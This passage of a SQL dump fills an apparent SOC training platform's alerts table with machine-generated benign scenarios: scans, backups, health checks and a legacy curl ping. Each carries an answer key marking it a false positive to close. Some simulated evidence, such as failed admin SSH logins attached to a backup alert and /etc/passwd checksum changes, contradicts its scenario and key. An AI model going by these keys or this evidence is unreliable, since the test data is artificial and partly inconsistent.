--connect\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.317Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:45:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.22\\\",\\\"dst_ip\\\":\\\"10.0.0.23\\\",\\\"username\\\":\\\"legacy_app\\\",\\\"hostname\\\":\\\"server-old\\\",\\\"command_line\\\":\\\"/usr/bin/legacy_tool --connect\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.317Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:45:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.22\\\",\\\"dst_ip\\\":\\\"10.0.0.23\\\",\\\"username\\\":\\\"legacy_app\\\",\\\"hostname\\\":\\\"server-old\\\",\\\"command_line\\\":\\\"/usr/bin/legacy_tool --connect\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.317Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:45:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.22\\\",\\\"dst_ip\\\":\\\"10.0.0.23\\\",\\\"username\\\":\\\"legacy_app\\\",\\\"hostname\\\":\\\"server-old\\\",\\\"command_line\\\":\\\"/usr/bin/legacy_tool --connect\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1801, 'Routine IT Vulnerability Scan Misinterpreted as Brute Force Attack', 'low', 'Azure Sentinel', 'A scheduled vulnerability scan using internal security tools was incorrectly flagged as a brute force attack due to multiple login attempts.', 'Brute Force', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:00:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"10.0.0.30\",\"dst_ip\":\"10.0.0.40\",\"username\":\"scan_user\",\"hostname\":\"vuln-scan-server\",\"request_body\":\"Multiple login attempts detected\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"IP address used by internal vulnerability scanning tool.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.40\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Target IP of routine vulnerability scan.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"scan_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Account used for authorized vulnerability scans.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The activity corresponds with the scheduled vulnerability scans performed by IT.\"}', 'Intermediate', 'SIEM', 5, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.319Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T14:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.0.30\\\",\\\"dst_ip\\\":\\\"10.0.0.40\\\",\\\"username\\\":\\\"scan_user\\\",\\\"hostname\\\":\\\"vuln-scan-server\\\",\\\"request_body\\\":\\\"Multiple login attempts detected\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.319Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T14:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.0.30\\\",\\\"dst_ip\\\":\\\"10.0.0.40\\\",\\\"username\\\":\\\"scan_user\\\",\\\"hostname\\\":\\\"vuln-scan-server\\\",\\\"request_body\\\":\\\"Multiple login attempts detected\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.319Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T14:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.0.30\\\",\\\"dst_ip\\\":\\\"10.0.0.40\\\",\\\"username\\\":\\\"scan_user\\\",\\\"hostname\\\":\\\"vuln-scan-server\\\",\\\"request_body\\\":\\\"Multiple login attempts detected\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.319Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T14:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.0.30\\\",\\\"dst_ip\\\":\\\"10.0.0.40\\\",\\\"username\\\":\\\"scan_user\\\",\\\"hostname\\\":\\\"vuln-scan-server\\\",\\\"request_body\\\":\\\"Multiple login attempts 
detected\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.319Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T14:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.0.30\\\",\\\"dst_ip\\\":\\\"10.0.0.40\\\",\\\"username\\\":\\\"scan_user\\\",\\\"hostname\\\":\\\"vuln-scan-server\\\",\\\"request_body\\\":\\\"Multiple login attempts detected\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1802, 'Benign Network Monitoring Misidentified as Phishing Attempt', 'low', 'Splunk', 'Network monitoring packets were mistakenly flagged as a phishing attempt due to heuristic matching of packet metadata.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T16:25:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.50\",\"dst_ip\":\"10.0.0.60\",\"username\":\"net_monitor\",\"hostname\":\"monitor-server\",\"request_body\":\"Routine network monitoring packet\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"IP address of network monitoring tool.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.60\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Destination IP for network monitoring packets.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The flagged activity is consistent with normal network monitoring operations.\"}', 'Intermediate', 'SIEM', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.321Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T16:25:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.50\\\",\\\"dst_ip\\\":\\\"10.0.0.60\\\",\\\"username\\\":\\\"net_monitor\\\",\\\"hostname\\\":\\\"monitor-server\\\",\\\"request_body\\\":\\\"Routine network monitoring packet\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.321Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T16:25:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.50\\\",\\\"dst_ip\\\":\\\"10.0.0.60\\\",\\\"username\\\":\\\"net_monitor\\\",\\\"hostname\\\":\\\"monitor-server\\\",\\\"request_body\\\":\\\"Routine network monitoring packet\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.321Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T16:25:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.50\\\",\\\"dst_ip\\\":\\\"10.0.0.60\\\",\\\"username\\\":\\\"net_monitor\\\",\\\"hostname\\\":\\\"monitor-server\\\",\\\"request_body\\\":\\\"Routine network monitoring packet\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.321Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T16:25:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.50\\\",\\\"dst_ip\\\":\\\"10.0.0.60\\\",\\\"username\\\":\\\"net_monitor\\\",\\\"hostname\\\":\\\"monitor-server\\\",\\\"request_body\\\":\\\"Routine network monitoring packet\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.321Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T16:25:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.50\\\",\\\"dst_ip\\\":\\\"10.0.0.60\\\",\\\"username\\\":\\\"net_monitor\\\",\\\"hostname\\\":\\\"monitor-server\\\",\\\"request_body\\\":\\\"Routine network monitoring packet\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1803, 'Routine IT Vulnerability Scanning Detected', 'low', 'Splunk', 'A vulnerability scan was detected originating from an internal IT system. This activity is part of scheduled security assessments.', 'Lateral Movement', 'T1046', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:15:30Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.1.5\",\"dst_ip\":\"192.168.1.100\",\"username\":\"admin_scan\",\"hostname\":\"IT-SCAN-01\",\"command_line\":\"nmap -sV 192.168.1.0/24\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.1.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for vulnerability scanning\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin_scan\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"clean\",\"details\":\"Authorized scanning account\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"This alert was generated by routine IT security scans and poses no threat.\"}', 'Intermediate', 'SIEM', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.322Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:15:30Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.1.5\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"admin_scan\\\",\\\"hostname\\\":\\\"IT-SCAN-01\\\",\\\"command_line\\\":\\\"nmap -sV 192.168.1.0/24\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.322Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:15:30Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.1.5\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"admin_scan\\\",\\\"hostname\\\":\\\"IT-SCAN-01\\\",\\\"command_line\\\":\\\"nmap -sV 192.168.1.0/24\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.322Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:15:30Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.1.5\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"admin_scan\\\",\\\"hostname\\\":\\\"IT-SCAN-01\\\",\\\"command_line\\\":\\\"nmap -sV 192.168.1.0/24\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.322Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:15:30Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.1.5\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"admin_scan\\\",\\\"hostname\\\":\\\"IT-SCAN-01\\\",\\\"command_line\\\":\\\"nmap -sV 192.168.1.0/24\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.322Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:15:30Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.1.5\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"admin_scan\\\",\\\"hostname\\\":\\\"IT-SCAN-01\\\",\\\"command_line\\\":\\\"nmap -sV 192.168.1.0/24\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1804, 'Authorized Administrative Backup Process Detected', 'low', 'Wazuh', 'A backup process executed by an IT administrator was detected. This is a regular operation for data protection.', 'Persistence', 'T1053', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.15\",\"username\":\"backup_admin\",\"hostname\":\"BACKUP-SERVER-01\",\"command_line\":\"rsync -avz /data /backup\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for backup operations\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"rsync -avz /data /backup\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Scheduled backup command executed by an authorized user\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"persistence\",\"analysis_notes\":\"The detected process is a part of the scheduled backup routine and is not malicious.\"}', 'Intermediate', 'SIEM', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.323Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.15\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"BACKUP-SERVER-01\\\",\\\"command_line\\\":\\\"rsync -avz /data /backup\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.323Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin 
from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.15\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"BACKUP-SERVER-01\\\",\\\"command_line\\\":\\\"rsync -avz /data /backup\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.323Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.15\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"BACKUP-SERVER-01\\\",\\\"command_line\\\":\\\"rsync -avz /data /backup\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.323Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.15\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"BACKUP-SERVER-01\\\",\\\"command_line\\\":\\\"rsync -avz /data /backup\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.323Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.15\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"BACKUP-SERVER-01\\\",\\\"command_line\\\":\\\"rsync -avz /data /backup\\\"}\"}],\"query\":\"index=main 
source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1805, 'Benign System Health Check Activity', 'low', 'Elastic SIEM', 'Regular system health check scripts executed on multiple servers. These scripts are part of routine maintenance.', 'Execution', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:22:10Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.3.20\",\"username\":\"health_check\",\"hostname\":\"MONITOR-01\",\"command_line\":\"python health_check.py\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.3.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP used for health checks\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"python health_check.py\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Routine health check script\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"execution\",\"analysis_notes\":\"This activity is part of regular system checks and does not indicate an attack.\"}', 'Intermediate', 'SIEM', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.324Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T14:22:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"username\\\":\\\"health_check\\\",\\\"hostname\\\":\\\"MONITOR-01\\\",\\\"command_line\\\":\\\"python health_check.py\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.324Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T14:22:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"username\\\":\\\"health_check\\\",\\\"hostname\\\":\\\"MONITOR-01\\\",\\\"command_line\\\":\\\"python health_check.py\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.324Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T14:22:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"username\\\":\\\"health_check\\\",\\\"hostname\\\":\\\"MONITOR-01\\\",\\\"command_line\\\":\\\"python health_check.py\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.324Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T14:22:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"username\\\":\\\"health_check\\\",\\\"hostname\\\":\\\"MONITOR-01\\\",\\\"command_line\\\":\\\"python health_check.py\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.324Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T14:22:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"username\\\":\\\"health_check\\\",\\\"hostname\\\":\\\"MONITOR-01\\\",\\\"command_line\\\":\\\"python health_check.py\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1806, 'Misconfigured Legacy Application Detected', 'medium', 'Azure Sentinel', 'A legacy application generated unusual traffic patterns due to misconfiguration. No malicious activity detected.', 'Network Anomaly', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.4.10\",\"dst_ip\":\"203.0.113.10\",\"hostname\":\"LEGACY-APP-01\",\"command_line\":\"curl http://203.0.113.10:8080/api/ping\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.4.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP associated with legacy application\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"External IP with no malicious reports\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_anomaly\",\"analysis_notes\":\"The traffic was generated by a misconfigured legacy application and is not harmful.\"}', 'Intermediate', 'SIEM', 5, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.326Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T09:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.4.10\\\",\\\"dst_ip\\\":\\\"203.0.113.10\\\",\\\"hostname\\\":\\\"LEGACY-APP-01\\\",\\\"command_line\\\":\\\"curl http://203.0.113.10:8080/api/ping\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.326Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T09:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.4.10\\\",\\\"dst_ip\\\":\\\"203.0.113.10\\\",\\\"hostname\\\":\\\"LEGACY-APP-01\\\",\\\"command_line\\\":\\\"curl http://203.0.113.10:8080/api/ping\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.326Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T09:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.4.10\\\",\\\"dst_ip\\\":\\\"203.0.113.10\\\",\\\"hostname\\\":\\\"LEGACY-APP-01\\\",\\\"command_line\\\":\\\"curl http://203.0.113.10:8080/api/ping\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.326Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T09:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.4.10\\\",\\\"dst_ip\\\":\\\"203.0.113.10\\\",\\\"hostname\\\":\\\"LEGACY-APP-01\\\",\\\"command_line\\\":\\\"curl http://203.0.113.10:8080/api/ping\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.326Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T09:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.4.10\\\",\\\"dst_ip\\\":\\\"203.0.113.10\\\",\\\"hostname\\\":\\\"LEGACY-APP-01\\\",\\\"command_line\\\":\\\"curl http://203.0.113.10:8080/api/ping\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
